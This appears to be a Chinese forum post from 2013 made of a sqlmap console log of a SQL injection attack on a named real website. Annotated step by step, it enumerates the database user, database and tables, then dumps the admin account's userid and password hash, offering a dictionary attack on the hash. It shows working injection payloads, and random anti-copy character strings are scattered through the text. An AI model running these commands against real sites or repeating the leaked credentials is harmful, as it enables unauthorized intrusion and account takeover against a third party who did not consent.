D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db u9 b. c/ K$ z+ P0 \9 d
ms "Mysql" --current-user /* 注解:获取当前用户名称
# N" j8 E, w8 V \4 l& ] sqlmap/0.9 - automatic SQL injection and database takeover tool- j4 L3 }+ d5 _0 ~3 A
http://sqlmap.sourceforge.net starting at: 16:53:54
# E5 _# `5 O% G3 P9 W+ Q[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: R8 }- G9 L. \" Q4 d/ h
session file2 B0 |1 ?+ e- m5 `8 ^
[16:53:54] [INFO] resuming injection data from session file
1 C3 i1 _ X3 n- `7 F5 L[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file9 p. i9 N) ^" o, _
[16:53:54] [INFO] testing connection to the target url
6 Q% G1 ?! |& a$ `0 ~+ D2 Bsqlmap identified the following injection points with a total of 0 HTTP(s) reque4 a* s ?' c; K' p) Y- O& J
sts:( e; p+ H2 o1 p. Y8 j2 |- U8 S8 ]* P
---
) T6 g5 L( e) ]Place: GET
/ L9 z6 N1 ]7 g8 e G. A7 S! n7 {Parameter: id
4 t6 A% L. O8 H Type: boolean-based blind
/ N2 _( V9 f1 M0 t/ \. V Title: AND boolean-based blind - WHERE or HAVING clause6 }9 K- S+ E- k* v, Z: x' K
Payload: id=276 AND 799=799
% M& w' d, @1 e) w Type: error-based
( k/ V& P5 s8 s* r* `& X Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 i8 d& f" Y$ Q" Y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ W8 \0 R. X3 ~( S
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% u2 i% V0 l3 C. H. W, m
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# s, V& p. l/ K5 i Type: UNION query
+ j# d o4 O9 U$ b0 b Title: MySQL UNION query (NULL) - 1 to 10 columns7 Q5 {" r+ w. T. |1 `0 n# k
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
/ c" h* Q9 o2 b6 w1 D3 ^8 d1 n( t9 C(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! f% C5 l5 r1 P' v t6 g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 X4 O9 ~6 |# ]6 N, J' n
Type: AND/OR time-based blind
9 X. H9 z3 H" I5 K+ F Title: MySQL > 5.0.11 AND time-based blind
6 z' t& \* ~. X3 K6 K) } f# w; d Payload: id=276 AND SLEEP(5)
. j: g7 s- ]4 ]* ^/ L---: d/ K; _6 E5 J9 N5 f2 U( s- [
[16:53:55] [INFO] the back-end DBMS is MySQL% F7 K2 F; N% B1 q0 s
web server operating system: Windows, k) u, g* I7 |* a
web application technology: Apache 2.2.11, PHP 5.3.0
- x3 P" D- v0 `( D' I, eback-end DBMS: MySQL 5.0+ ?# }& U' s5 \5 M' l# ~2 y7 y
[16:53:55] [INFO] fetching current user
2 k, m, L! C l, w. Acurrent user: 'root@localhost' 0 G7 l! ^- M3 W# b
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ Z4 Z' ]5 N* E* r# ]9 x1 Itput\www.wepost.com.hk' shutting down at: 16:53:58/ m! ?+ k0 b/ A1 \& ?) f* G" f- H8 p, N
7 ~7 p1 U( \; A2 sD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 U4 y( |, J$ [* [. S& }$ k
ms "Mysql" --current-db /*当前数据库. S/ f2 F) c. \: D! |& Q
sqlmap/0.9 - automatic SQL injection and database takeover tool6 h, O$ [3 k' B: D
http://sqlmap.sourceforge.net starting at: 16:54:16
U# [, B) B2 q. {! ][16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
, i$ Z$ k3 j$ O' `4 N% x session file3 B1 p o# S- A) x2 D
[16:54:16] [INFO] resuming injection data from session file% p5 h3 I6 D: r, `# P% Q* B
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
) ]; d- U5 }( ]/ k7 z( ^[16:54:16] [INFO] testing connection to the target url( O8 j2 I( y% u0 B! P
sqlmap identified the following injection points with a total of 0 HTTP(s) reque: @- V( l$ d) m* m
sts:
$ a1 w8 w0 m* {---
\& u1 T+ J( Y" rPlace: GET4 A& \% h5 S$ g6 p' u0 s+ l
Parameter: id
# O' C+ ^' b3 K! @2 y, C4 U! M1 e Type: boolean-based blind+ D% ^; ?! ]2 D" i/ n5 d9 z' V
Title: AND boolean-based blind - WHERE or HAVING clause
, ]5 x4 ` R: u( _+ v: n J* o Payload: id=276 AND 799=799
1 h6 t# \ J# f" B0 y6 e; S9 m5 o& V Type: error-based
: q3 ?, Y3 s6 M3 x Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- `1 b0 S' S9 L! ~0 H( c Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( {% p) x2 n2 }* f9 {) D( ~120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, U8 H$ G$ w" Y6 p8 J# n$ G),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 d i4 G, Z( t
Type: UNION query6 k7 y [+ t; U0 j* Q: [
Title: MySQL UNION query (NULL) - 1 to 10 columns
- j F7 z8 k, e Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 v" L/ w! o* K* M(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- \" R* s+ T7 s# A# n
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 b+ t# Z! D6 _3 D" ]$ P! B, t Type: AND/OR time-based blind! g; J, B- g$ T* u; B
Title: MySQL > 5.0.11 AND time-based blind
3 U3 a8 H1 O/ Y. ?. k. [, i! u. u; j Payload: id=276 AND SLEEP(5)
9 x& M ]- D2 }* b. V---
4 a- Y* T6 Z, Z[16:54:17] [INFO] the back-end DBMS is MySQL
# S4 O3 U# e, a8 _5 Y* T: jweb server operating system: Windows( P2 C3 }* q, L& X$ _/ D. ~
web application technology: Apache 2.2.11, PHP 5.3.0
3 u0 s3 Z; v* @0 Rback-end DBMS: MySQL 5.0
5 W) ?0 L2 Y2 v+ x8 O3 H7 [[16:54:17] [INFO] fetching current database
" o- J; A& f. C8 T8 J9 ~" Kcurrent database: 'wepost'
+ @/ D" [7 R" ^' V[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; t' N6 _) F% j1 C
tput\www.wepost.com.hk' shutting down at: 16:54:18/ Z w t0 _5 Y) a, g9 t- ^
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
1 S3 L2 ^: L3 O" A: Tms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
. B( g6 X; `( J( I! a9 D sqlmap/0.9 - automatic SQL injection and database takeover tool! }: K( j+ [4 i& C$ b1 |# A
http://sqlmap.sourceforge.net starting at: 16:55:25
/ }, w/ w6 O M2 C* S[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" t$ f D( y7 q1 x1 y0 W0 ?, Y session file
. f1 T" g, }' M8 l. _- j# e' N, ` @[16:55:25] [INFO] resuming injection data from session file
) O1 W; Q0 |1 {5 b[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
& T1 C2 s4 T" J/ U% G7 F: D0 u[16:55:25] [INFO] testing connection to the target url
4 y W" K; W1 M5 p8 }0 K7 R. csqlmap identified the following injection points with a total of 0 HTTP(s) reque. {; e- l* ?: @5 _; K5 Z
sts:
% b7 z+ O$ I/ b" ~6 T---
% X+ n# k2 g% S1 @7 x* TPlace: GET6 T+ Q ^% {: |3 K% ?3 X
Parameter: id1 z' N9 ?0 D& u1 \
Type: boolean-based blind3 a5 [7 c1 \! `7 `
Title: AND boolean-based blind - WHERE or HAVING clause2 u; T( U; q1 v" u/ F* j2 O3 m
Payload: id=276 AND 799=799* X; Y. k9 c; x5 q9 b9 V
Type: error-based
( A- r; E- t- O b& ~3 G k Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 `# Y- {/ D# ?/ r( @, u Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 V3 i0 j$ F/ C! G* n; U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! ]' K: e' C7 D [! {8 g+ @8 C),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) X T. T- e# S+ q3 @9 Z
Type: UNION query
+ n8 ]0 B( h7 X3 ^5 ` Title: MySQL UNION query (NULL) - 1 to 10 columns
: S4 n# j5 Z& Q7 K( U4 J7 ? Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! i5 |3 G: u) p, \0 D! e(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), G) m! h6 ]6 k
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; X! {0 x- m1 h' h5 @ V5 T
Type: AND/OR time-based blind
) V- o; j* H' E Title: MySQL > 5.0.11 AND time-based blind& Z _2 F( d. M+ i
Payload: id=276 AND SLEEP(5)
( H: L Q7 k. {---( s& ^ [6 V a: U" t( u
[16:55:26] [INFO] the back-end DBMS is MySQL
# u; X. X( g; h! r. v3 Wweb server operating system: Windows# f" U2 u6 V& [8 a
web application technology: Apache 2.2.11, PHP 5.3.00 y- y% {% a0 M; z) ~
back-end DBMS: MySQL 5.0
# \, j. c; v5 _ b& i[16:55:26] [INFO] fetching tables for database 'wepost'
3 d' m( E7 F) _& k a( J v6 C: H[16:55:27] [INFO] the SQL query used returns 6 entries
4 _8 W1 l I- L9 h0 q2 qDatabase: wepost
7 b/ m( ~ y# e; y+ s8 f[6 tables]
/ [+ c, a3 Q3 U$ c+-------------+1 u" L) y) t$ s6 j. p& D. w m
| admin |
% R* l9 y. a; C0 V| article |
# c: `% ^4 h% K, f$ T; n% C( V2 G| contributor |
5 S, y7 f) p/ l| idea |
' o } L# i% J( O5 G, I7 V4 l| image |
/ W2 g% l' A: t" _8 X# [$ C& X( _| issue |
3 t0 F* }1 q1 o% M+-------------+/ X Z8 I) |' Q4 Y1 z8 C
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou) Q- r5 G& }7 q" ]2 d
tput\www.wepost.com.hk' shutting down at: 16:55:33
" x$ B: |; ~2 t- M4 o# x! {2 y4 k4 K! i( w! U
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: d. p3 _4 \( C9 R5 Cms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名& \6 y* v% M- C F. o, t, p
sqlmap/0.9 - automatic SQL injection and database takeover tool
- X/ w1 l# A$ O7 H z http://sqlmap.sourceforge.net starting at: 16:56:066 j5 h6 r A/ _. e& _
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 S* b& ? x7 B* o+ d. U+ D6 Tsts:
J& U( N/ d! P* E# |! f9 x---
4 P2 q5 C' U' ]# O* E/ ]& zPlace: GET5 m5 T |* B4 W9 @% F/ ~
Parameter: id8 W+ b+ e! j0 @: S/ O9 {$ ?
Type: boolean-based blind1 ]$ W2 a7 Q5 n3 H
Title: AND boolean-based blind - WHERE or HAVING clause
O# x+ u& v9 `1 J$ N' R Payload: id=276 AND 799=7993 G! w% c! M; e# ]
Type: error-based4 Z3 N* v) N6 V# G
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 W6 n! T" a; j. s4 \
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ B, f! U# h3 Z+ H5 x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 I# E7 U" X. I z2 H4 ?( o T; W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& a6 N( \& t( @" ~3 M' m' [ Type: UNION query5 v2 q1 i1 z J& Z" g
Title: MySQL UNION query (NULL) - 1 to 10 columns
0 }) \: w9 q" V6 n4 C% o Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' s3 ^' G+ v/ Q1 x0 R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), {. h5 ^0 q, }5 }! G* X6 Q, K
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ w4 g" F6 J' h7 s Type: AND/OR time-based blind
5 Y! _: O \1 Z( t5 s5 y Title: MySQL > 5.0.11 AND time-based blind b j# R2 e# A9 s# \
Payload: id=276 AND SLEEP(5)- v) _2 s$ g- K0 H
---
3 I/ Z! D5 e6 l+ O! @$ \web server operating system: Windows5 ~! w: }7 X; I* H! h6 f5 X3 w
web application technology: Apache 2.2.11, PHP 5.3.0. a0 m$ q- E. r/ h+ t4 @" d1 A! Y
back-end DBMS: MySQL 5.0) v7 h X8 o* i7 F: H: f: N
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se7 I3 K: M \! ]
ssion': wepost, wepost) l. ?( [3 F7 t9 }7 ]
Database: wepost7 @, |# t' F- R. T$ N" K, \
Table: admin* b0 a' {- z0 R- B5 ^5 s
[4 columns]+ `9 j. r2 v: O; m7 F+ }7 c$ g
+----------+-------------+
4 h F6 q$ V& @ T! V/ f* O| Column | Type |) N3 j1 _7 r* p5 m* K
+----------+-------------+6 k3 r" E: ^0 T
| id | int(11) |' _1 w- J& K" L+ Z4 Z# ?1 V
| password | varchar(32) |3 J% ~* _/ n2 W% W4 g# q- X. @
| type | varchar(10) |, U& w' ^9 \% _$ h
| userid | varchar(20) |
6 h1 ^, E" g5 w) b& N e+----------+-------------+
3 z% L+ S& q% Y4 Z7 Z: y shutting down at: 16:56:19. u2 j, P% {* g$ f7 F( N) Z0 B
* c8 M; G' l0 s1 m9 A; q$ F2 [
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# `0 d9 y. p0 ems "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容2 T, @6 E L& e' [$ Y9 b- M' v0 V2 e
sqlmap/0.9 - automatic SQL injection and database takeover tool
$ H9 S# j. l# o: Z http://sqlmap.sourceforge.net starting at: 16:57:14
1 X+ Y! g" @. [1 f/ F0 @" M3 o2 Vsqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ q! y* }/ Y8 v* e3 f: Lsts:" m; h9 P) i$ V% {/ j
---9 g3 [: k5 c+ D6 ~
Place: GET9 i/ S1 P) G8 V
Parameter: id5 M5 f, Q6 p: a1 B# [" |
Type: boolean-based blind+ A6 t- O+ R+ d: G% e. Q2 M" ]
Title: AND boolean-based blind - WHERE or HAVING clause
: o# p% {2 A0 f+ D: o Payload: id=276 AND 799=7991 r/ Q( R4 e& d" E1 Z7 I, d; f
Type: error-based
8 B1 U! x7 H2 o( o# Y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# m. g% [ ]! b* t3 v Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: t2 z( |$ g/ E, ]
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ b4 v8 Z: E% z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! {* O7 x: J2 a; _1 E9 r& [( d$ m3 P* C Type: UNION query& R+ S6 Z. e4 X) {
Title: MySQL UNION query (NULL) - 1 to 10 columns0 ?5 G( x# q; k% C' K
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* \- R, `7 L1 S: H. X
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
! _& e& L0 m+ U6 A; W5 ACHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#1 [" x, y0 ~- x4 g0 \
Type: AND/OR time-based blind
& M5 ~5 H1 R/ ]. l3 k. X. o: T Title: MySQL > 5.0.11 AND time-based blind5 u# P- m& w7 n& i% w+ k
Payload: id=276 AND SLEEP(5)6 h/ g; N! u. n! M9 y4 s6 t# [
---% T, }/ w9 C6 |, g; x$ Z u
web server operating system: Windows
, n6 T8 R- r1 T6 X3 x! G4 Zweb application technology: Apache 2.2.11, PHP 5.3.0
0 A7 e4 H4 D4 ^/ P0 Bback-end DBMS: MySQL 5.0
1 [: R! I9 L6 C7 W$ n9 |recognized possible password hash values. do you want to use dictionary attack o
8 D0 a _& B2 e' h8 z _n retrieved table items? [Y/n/q] y2 A. f8 T k7 `+ ?1 e
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]9 `+ n# J) |* y6 z/ _: @' d
do you want to use common password suffixes? (slow!) [y/N] y( b2 y$ f5 H7 ]/ e
Database: wepost
- i. @7 d+ F) h PTable: admin- H: ^5 Z* `* j, o0 k: c5 V/ L
[1 entry]
( V% _6 g. P$ p# I9 U+----------------------------------+------------+3 R0 ?0 _( _& u d6 i
| password | userid |4 [/ f( H: o; f
+----------------------------------+------------+
8 A$ Y1 o$ M5 O0 l| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
/ X! @5 j& t; |0 L+----------------------------------+------------+
' s8 E& ^) c( v% t: w" G8 y shutting down at: 16:58:143 k- `" w) ~& V
! U6 U! n8 u- B4 v; I0 W; T
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对